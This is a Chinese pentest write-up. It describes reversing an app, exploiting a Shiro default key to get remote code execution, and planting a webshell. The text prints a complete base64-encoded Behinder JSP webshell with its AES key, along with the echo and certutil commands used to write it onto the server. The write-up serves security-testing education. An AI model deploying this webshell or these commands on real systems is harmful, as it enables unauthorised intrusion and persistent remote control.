APP简单逆向到getshell
2022-11-8 08:10:13 Author: 系统安全运维(查看原文) 阅读量:16 收藏

前言

某APP渗透测试,主页就一个登录框,登录框认证调用的公司门户站的SSO单点登录,再加上长亭的waf,几乎牢不可破,常规手法都有尝试,没有什么突破点。

脱壳逆向

jadx一把梭,看看有没有什么敏感信息泄露,审源码的时候发现有爱加密加固,反射大师脱壳一把梭,得到dex文件,然后又jadx一把梭看代码(这个过程就省略了,主题不是它)。

逆向分析

大致粗略的看了一下,用的okhttp框架,有反抓包,直接hook绕过即可正常抓包,数据库密码,阿里osskey之类的也没有硬编码在app中,没有什么敏感信息可以利用,登录验证算法都是调用的单点登录,也没有什么突破点。

突破口

#1 正当没啥进展的时候,乱翻了翻基础类源码,发现BaseUrlConfig类中有一串URL,都是一个ip,但是端口不一样。
推荐一款app信息搜集工具,能主动扫描获取app中的url信息,AppInfoScanner
#2 访问链接,页面空白,由图标得知上面搭载的tomcat。
#3 然后全局搜索http://关键词,又搜到一个url(这次是域名),类似于http://xxxxx:8080/web/weixin/xxxxxx,浏览器打开看了一下,没啥东西,也是空白页面。因为url中出现weixin关键词,推测两种可能,第一种:登陆点,第二种,微信授权接口。所以简单猜了下路径,在weixin后面加了个login,http://xxxxx:8080/web/weixin/login,发现登陆点,由于路径跟上面发现的url类似,推测它也是java的后端,直接shiro一把梭,默认key,成功rce,java后端rce一般都是system权限。

写入webshell踩坑

RCE之后呢,当然不能只满足现状,为了方便管理,肯定得写个webshell的。
写shell,用的最多的就几种,小马传大马,手动echo写入,远程下载等方式,这里服务器不通外网,也就没法远程下载了,没有上传点,而且小马的代码量跟冰蝎差不多,就不考虑写小马了。

坑1—特殊字符转义

windows服务器写shell,常规做法无非就是echo shell内容 > shell.jsp,shell内容中肯定有特殊字符,用^转义一下就行了,但是这里目标环境是jsp,jsp马跟其他马不一样,内容多,特殊字符多,转义起来麻烦得很,我这里以写冰蝎为例,转义了半天,把所有特殊字符都转义了,先本地测试了一下,能成功写马,但是在shiro工具里就不行…估计跟编码有关,大概试了半个多小时,无果。放弃。

坑2—BASE解码报错

特殊字符多,还有一中办法是先把shell内容base64编码一下,然后在目标机上解码。cmd是有base64解码的功能的,具体可以百度certutil用法。
certutil -decode 1.txt 2.txt //1.txt解码生成2.txt。
情况还是一样的,本地测试成功,在服务器上就是解码失败,输出长度为0,箭头指向的本来是0的,我偷懒就随便找了张图 。

除此之外,什么字符拼接啊,base64一段段输入然后解码啊,全试过了,不是报错就是写不进去或者是base解码输出长度为0,大概率是目标服务器的问题,在这里浪费了大量时间。
成功写入webshell
最后咋解决的呢,最后采用的fuzz大法,把shell内容一段段base64编码上传,然后解码,一段一段的fuzz测试,看到底是那部分字符导致了base解码失败。最后锁定了冰蝎马的最后四个字符;}%>,不加这四个字符,base64解码能正常输出内容,只要base64编码里是以这四个字符结尾,那么就解码报错。

坑3—根目录webshell不解析

成功写入webshell之后,解码也成功了,webshell地址写在了网站根目录,连接时发现报错,手动访问发现webshell直接变成了下载链接,webshell根本没解析。后来将webshell写入docs目录下才成功解析,因为docs目录是tomcat自带的说明文档目录。

整理思路

1.找到了问题所在,那么就定点打击。思路是:先将除最后四个字符以外的shell内容base编码传到目标上,然后解码输出到2.jsp。
echo PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmF4LmNyeXB0by4qLGphdmF4LmNyeXB0by5zcGVjLioiJT48JSFjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXJ7VShDbGFzc0xvYWRlciBjKXtzdXBlcihjKTt9cHVibGljIENsYXNzIGcoYnl0ZSBbXWIpe3JldHVybiBzdXBlci5kZWZpbmVDbGFzcyhiLDAsYi5sZW5ndGgpO319JT48JWlmIChyZXF1ZXN0LmdldE1ldGhvZCgpLmVxdWFscygiUE9TVCIpKXtTdHJpbmcgaz0iZTQ1ZTMyOWZlYjVkOTI1YiI7c2Vzc2lvbi5wdXRWYWx1ZSgidSIsayk7Q2lwaGVyIGM9Q2lwaGVyLmdldEluc3RhbmNlKCJBRVMiKTtjLmluaXQoMixuZXcgU2VjcmV0S2V5U3BlYyhrLmdldEJ5dGVzKCksIkFFUyIpKTtuZXcgVSh0aGlzLmdldENsYXNzKCkuZ2V0Q2xhc3NMb2FkZXIoKSkuZyhjLmRvRmluYWwobmV3IHN1bi5taXNjLkJBU0U2NERlY29kZXIoKS5kZWNvZGVCdWZmZXIocmVxdWVzdC5nZXRSZWFkZXIoKS5yZWFkTGluZSgpKSkpLm5ld0luc3RhbmNlKCkuZXF1YWxzKHBhZ2VDb250ZXh0KQ>1.txtcertutil -decode 1.txt 2.jsp
2.剩下的四个特殊字符经过echo语句 手动追加到2.jsp末尾
echo ^;^}^%^>>2.jsp
3.最后成功写入docs目录。附上一张连接图

结尾

这波写shell,大概耗时两个多小时,还有很多小细节没说,本地操作不报错并不代表服务器上操作不会报错,环境可能不一样,有时候还有玄学问题,在此之前我也有过shiro写shell的经历,但是那次没这么多问题,一次性base解码写shell成功,而且直接通过文件下载把webshell下载到目标中也行,每个人遇到的环境都可能不一样,最好的方法就是不断fuzz测试,找到报错的原因,然后精准打击。再补充一句…内存马注入也可以,但是任意把站弄崩,别问我怎么知道的,不到万不得已不注入内存马。
最后确认资产的时候没打偏,打到了该公司的一台其他业务的服务器上去了,如果从正面刚APP的话,就算有shiro,也没法绕waf,如果正面无法突破的话,可以尝试搜集一些app内部的敏感信息,说不定有突破口。

来源先知(https://xz.aliyun.com/t/10906#toc-0)

如有侵权,请联系删除

好文推荐

红队打点评估工具推荐
干货|红队项目日常渗透笔记
实战|后台getshell+提权一把梭
一款漏洞查找器(挖漏洞的有力工具)
神兵利器 | 附下载 · 红队信息搜集扫描打点利器
神兵利器 | 分享 直接上手就用的内存马(附下载)
推荐一款自动向hackerone发送漏洞报告的扫描器
欢迎关注 系统安全运维


文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247511831&idx=2&sn=9513701c4ac28e24b19012304d9c5449&chksm=c3087c67f47ff57177a98913917d5a4b993ff1cd39b052bd88383858cfc0473530331db0f338#rd
如有侵权请联系:admin#unsafe.sh